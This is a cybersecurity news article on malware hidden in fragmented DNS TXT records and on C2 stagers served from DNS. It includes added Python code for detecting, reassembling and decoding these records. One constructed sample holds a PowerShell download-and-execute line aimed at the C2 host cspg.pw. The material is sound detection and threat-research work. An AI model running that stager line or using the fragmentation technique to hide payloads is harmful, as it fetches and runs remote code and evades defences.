Categories: Cyber Security News

Hackers Exploit DNS Blind Spots to Conceal and Deliver Malware

Security researchers have documented a technique in which cybercriminals use DNS (Domain Name System) infrastructure to conceal malware payloads and command-and-control communications.

Analysis of passively collected DNS records from DNSDB Scout revealed that attackers are splitting files into pieces and storing those pieces in DNS TXT records, turning the zone's name servers (and the resolvers that cache their answers) into an unwitting file store that persists until the records are removed or overwritten.

Advanced File Fragmentation Technique Discovered

The investigation began with reports of images being hidden in DNS records, prompting researchers to search TXT records for the hexadecimal magic bytes (file signatures) of common executable and document formats.

Using a regular expression over the hex-encoded TXT text, such as ^"((ffd8ffe[0-9a-f].{12,})|(89504e47.{12,})|(4749463861.{8,})|(255044462d.{10,})|(504b0304.{12,})|(4d5a.{16,59}|4d5a.{61,})|(7f454c46.{12,})|(c[ef]faedfe.{12,})|(1f8b08.{14,})|(377abcaf271c.{8,})|(526172211a07.{8,})), whose alternatives cover JPEG, PNG, GIF, PDF, ZIP, MZ (Windows PE), ELF, Mach-O, gzip, 7z and RAR signatures at the start of a record, researchers identified TXT records beginning with executable file header sequences.

A significant finding from 2021-2022 data was a TXT record whose raw RDATA begins with the sequence

C83464356139303030303330303030303030343030303030306666666630303030623830303030303030303030303030303430303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030306538303030303030306531666261306530306234303963643231623830313463636432313534363836393733323037303732366636373732363136643230363336313665366536663734323036323635

The leading byte 0xC8 is the length of the TXT character-string (200), and the 200 printable characters that follow are themselves hex: they decode to 4d5a9000..., the first 100 bytes of a Windows PE executable, from the MZ signature through the e_lfanew field (e8000000) and the DOS stub text "This program cannot be". Because the payload is stored as hex text, each TXT string carries only half its length in real file bytes.

The same header value appeared across three different domains, each using an identical subdomain naming pattern.

ScreenMate Malware Distribution Network

Analysis of the domain “*.felix.stf.whitetreecollective[.]com” revealed hundreds of subdomains whose leftmost label was an incrementing integer, each carrying a different TXT RDATA value.

This suggested that the attackers were fragmenting executable files across subdomains, using integer values to maintain the correct sequence order.

By reconstructing these fragments, researchers identified two SHA256 file hashes:

7ff0ecf2953b8662ede1577e330a514f09992c18aa3c14ed77cf2ffc115b0866 and e7b22ba761a7f853b63933ffe517cc61596710dbdee992a429ac1bc8d04186a1.
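The detection and reassembly steps described above (signature matching on hex-encoded TXT text, then ordering integer-labelled fragments and decoding them), as an added example that is not code from the article or from the researchers' tooling. It assumes passive-DNS exports give TXT RDATA as raw hex in the RFC 1035 wire format (a length byte followed by that many bytes, possibly repeated), which is how the record quoted above reads, with 0xC8 = 200 as the length byte. The `example.invalid` records and the fake executable are constructed for the demonstration; the page's own record is used only to show the signature match.

```python
"""Find file fragments stored in DNS TXT records and reassemble them.

Added example, not from the article. Assumes passive-DNS TXT RDATA is raw
hex in RFC 1035 wire format and that fragments sit under integer-labelled
subdomains, as the article describes for *.felix.stf.whitetreecollective.
"""
import re
from collections import defaultdict

# File signatures from the article's regex (hex, lower-case), by file type.
MAGIC = [
    ("jpeg", r"ffd8ffe[0-9a-f]"), ("png", r"89504e47"), ("pdf", r"255044462d"),
    ("zip", r"504b0304"), ("pe", r"4d5a"), ("elf", r"7f454c46"),
    ("macho", r"c[ef]faedfe"), ("gzip", r"1f8b08"),
    ("7z", r"377abcaf271c"), ("rar", r"526172211a07"),
]
MAGIC_RX = [(name, re.compile("^" + pat)) for name, pat in MAGIC]


def txt_strings(rdata_hex):
    """Split raw TXT RDATA into its RFC 1035 <character-string>s: each is a
    length byte followed by up to 255 bytes, and a record may hold several."""
    raw = bytes.fromhex(rdata_hex)
    out, i = [], 0
    while i < len(raw):
        n = raw[i]
        out.append(raw[i + 1:i + 1 + n])
        i += 1 + n
    return out


def txt_text(rdata_hex):
    """Concatenate the character-strings, as a client reading the TXT would."""
    return b"".join(txt_strings(rdata_hex)).decode("ascii", "replace")


def classify(rdata_hex):
    """File type if the TXT text starts with a known signature, else None.
    Only the first fragment of a split file carries the signature."""
    text = txt_text(rdata_hex).strip().lower()
    for name, rx in MAGIC_RX:
        if rx.match(text):
            return name
    return None


def scan(records):
    """records: {owner_name: rdata_hex} -> {owner: file_type} for hits."""
    hits = {}
    for owner, rdata_hex in records.items():
        kind = classify(rdata_hex)
        if kind:
            hits[owner] = kind
    return hits


def reassemble(records):
    """Group owners whose leftmost label is an integer under their parent,
    order fragments by that integer, hex-decode the join -> {parent: bytes}."""
    groups = defaultdict(dict)
    for owner, rdata_hex in records.items():
        label, _, parent = owner.partition(".")
        if label.isdigit():
            groups[parent][int(label)] = txt_text(rdata_hex).strip()
    files = {}
    for parent, parts in groups.items():
        try:
            files[parent] = bytes.fromhex("".join(parts[i] for i in sorted(parts)))
        except ValueError:
            pass  # a missing or non-hex fragment: leave this set out
    return files


def wrap_txt(text):
    """Inverse of txt_text: text -> raw TXT RDATA hex in 255-byte strings."""
    data = text.encode("ascii")
    chunks = [data[i:i + 255] for i in range(0, len(data), 255)]
    return "".join(bytes([len(c)]).hex() + c.hex() for c in chunks)


# The record quoted in the article: length byte 0xC8 (200), then 200 hex
# characters that decode to the first 100 bytes of a PE file.
PAGE_RECORD = "C83464356139303030303330303030303030343030303030306666666630303030623830303030303030303030303030303430303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030306538303030303030306531666261306530306234303963643231623830313463636432313534363836393733323037303732366636373732363136643230363336313665366536663734323036323635"

# Constructed sample (not real malware): a fake executable, MZ header plus
# DOS-stub text, hex-encoded and split across integer-labelled subdomains.
FAKE_EXE = b"MZ\x90\x00" + bytes(60) + b"This program cannot be run in DOS mode.\r\n$" + bytes(16)
_HEX = FAKE_EXE.hex()
SAMPLE_RECORDS = {f"{i}.felix.example.invalid": wrap_txt(_HEX[j:j + 64])
                  for i, j in enumerate(range(0, len(_HEX), 64))}
SAMPLE_RECORDS["example.invalid"] = wrap_txt("v=spf1 -all")  # benign TXT, for contrast

if __name__ == "__main__":
    print("page record:", classify(PAGE_RECORD), txt_text(PAGE_RECORD)[:16])
    print("flagged:", scan(SAMPLE_RECORDS))
    for parent, blob in reassemble(SAMPLE_RECORDS).items():
        print(parent, len(blob), "bytes, starts", blob[:2], blob[0x40:0x66])
```

Note that signature matching alone flags only the `0.` fragment; the rest of the file is invisible to it, which is why a hunt for this technique also needs the grouping step (many integer-labelled siblings under one parent, each answering with a long, hex-only TXT).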

Both files were identified as Joke Screenmate malware, which simulates destructive actions through fake error messages, interferes with user control by being difficult to close, displays unsolicited content, and can cause system performance issues.

Command-and-Control Infrastructure in DNS

Further investigation revealed malicious commands stored in TXT records, particularly associated with drsmitty[.]com domains.

One subdomain’s TXT record contained an encoded PowerShell script functioning as a stager: it connected to cspg[.]pw and requested /api/v1/nps/payload/stage1, the default stage-1 endpoint of the Covenant C2 framework.
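The check a responder would run on such a record, as an added example rather than the article's or the researchers' code: decode a PowerShell -EncodedCommand argument (base64 over UTF-16LE) found in TXT text and pull out the URLs it contacts, flagging the Covenant stage-1 path named above. The sample TXT is constructed to resemble the stager described under drsmitty[.]com; the actual record is not on the page, and the sample is handled as text only.

```python
"""Decode a PowerShell -EncodedCommand stager found in DNS TXT text.

Added example, not from the article. SAMPLE_TXT is constructed; nothing
in it is executed, it is only parsed.
"""
import base64
import re

# powershell.exe accepts -e, -ec, -enc and -encodedcommand; the argument is
# base64 of the script encoded as UTF-16LE.
ENC_RX = re.compile(r"(?i)-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})")
URL_RX = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"()]*)?")
COVENANT_STAGE1 = "/api/v1/nps/payload/stage1"  # Covenant default, per the article


def decode_encoded_command(txt):
    """Return the decoded script if txt carries an encoded command, else None."""
    m = ENC_RX.search(txt)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))  # tolerate stripped padding
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("latin-1")  # not UTF-16LE: still show the bytes


def stager_indicators(txt):
    """Decode the TXT text if needed and extract URLs plus a Covenant flag."""
    script = decode_encoded_command(txt) or txt
    urls = URL_RX.findall(script)
    return {
        "script": script,
        "urls": urls,
        "covenant_stage1": any(COVENANT_STAGE1 in u for u in urls),
    }


def encode_command(script):
    """How such a record is produced: base64 over UTF-16LE (helper for the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample in the shape the article describes (cspg[.]pw plus the
# Covenant stage-1 path); this is not the actual record from the domain.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://cspg.pw/api/v1/nps/payload/stage1')"
SAMPLE_TXT = "powershell -nop -w hidden -enc " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(stager_indicators(SAMPLE_TXT))
```

The same decoder applies to TXT answers seen in resolver or DNS-firewall logs; a hit on a known framework path such as the Covenant default is a strong signal, while any URL at all inside a decoded TXT answer is worth a look.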

The technique shows how DNS infrastructure can be weaponized both to host payload fragments and to carry C2 instructions: DNS traffic is almost always allowed outbound and TXT answers are rarely inspected, so these records sit outside the reach of controls that focus on web downloads.


The post Hackers Exploit DNS Blind Spots to Conceal and Deliver Malware appeared first on Cyber Security News.
